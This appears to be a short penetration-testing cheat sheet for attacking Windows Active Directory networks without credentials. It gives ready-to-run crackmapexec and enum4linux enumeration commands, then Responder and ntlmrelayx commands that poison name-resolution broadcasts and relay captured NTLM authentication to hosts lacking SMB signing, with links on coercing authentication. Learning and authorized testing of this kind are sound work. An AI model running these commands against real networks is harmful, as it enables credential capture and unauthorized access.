#########
w/o Creds
#########

| First enumeration 

.. code-block:: bash

    RHOSTS="192.168.1.0/24"
    crackmapexec smb $RHOSTS
    crackmapexec smb $RHOSTS -u 'a' -p '' --shares
    crackmapexec rdp $RHOSTS
    crackmapexec winrm $RHOSTS
    crackmapexec ldap $RHOSTS
    crackmapexec wmi $RHOSTS

    enum4linux $RHOSTS

|

*************
NetNTLM Relay
*************

| https://beta.hackndo.com/ntlm-relay/
| https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html

| Responder will respond to any broadcast request (MDNS, LLMNR ..) and trigger authentification
| ntlmrelayx will relay NetNTLMv2 auth to targets
| possible targets are servers without SMB signature, cme (crackmapexec) 

.. code-block:: bash

    cme smb 192.168.0.0/24 --gen-relay-list /tmp/targets.txt
    ntlmrelayx.py -smb2support --no-http-server -ip 192.168.45.208 -w -tf /tmp/targets.txt
    sudo responder -I tun0 -w

| 

| You can try to force NTLM authentification 
| https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/printers-spooler-service-abuse
| https://github.com/p0dalirius/Coercer
|